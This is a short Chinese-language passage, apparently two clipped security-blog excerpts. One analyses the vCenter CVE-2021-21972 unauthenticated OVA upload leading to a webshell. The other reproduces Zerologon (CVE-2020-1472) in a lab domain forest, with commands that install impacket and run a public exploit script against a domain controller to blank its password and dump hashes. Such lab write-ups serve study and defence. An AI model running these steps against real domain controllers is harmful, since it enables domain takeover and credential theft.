CVE-2021-21972 复现和分析
0x01 背景vSphere是VMware推出的虚拟化平台套件,包含ESXi、vCenter Server等一系列的软件。其中vCenter Server为 ESXi的控制中心,可从单一控制点统一管理数据中心的所有vSphere主机和虚拟机,使得IT管理员能够提高控制能力,简化入场任务,并降低IT环境的管理复杂性与成本。
vSphere Client(HTML5)在vCenter Server插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放443端口的服务器向vCenter Server发送精心构造的请求,从而在服务器上写入webshell,最终造成远程任意代码执行。
0x02 代码分析vCenter Server的vROPS插件的API未经过鉴权,存在一些敏感接口。其中 uploadova 接口存在一个上传 OVA 文件的功能:
@RequestMapping( value = {"/uploadova"}, method = {RequestMethod.POST})public void uploadO ...
林级域环境下复现CVE-2020-1472
环境
域林环境
根DC:10.100.100.100(server2019)
一级林DC:10.100.100.101(server2016)
二级林DC:10.100.100.102(server2012R2)
跳板机(攻击机):10.100.100.105(WIN10)
简要拓扑
过程
利用过程:将域控机器账户密码设置为空->读取域管hash->读取sam文件hash(ntds.dit)->恢复域控机器账户密码
攻击首先安装impacket:
git clone https://github.com/SecureAuthCorp/impacket.gitcd impacketpip install -r requirements.txtpython setup.py install
然后下载利用脚本
git clone https://github.com/dirkjanm/CVE-2020-1472cd CVE-2020-1472
直接拿根域测,执行
python cve-2020-1472-exploit.py AD 10.100.100.100
...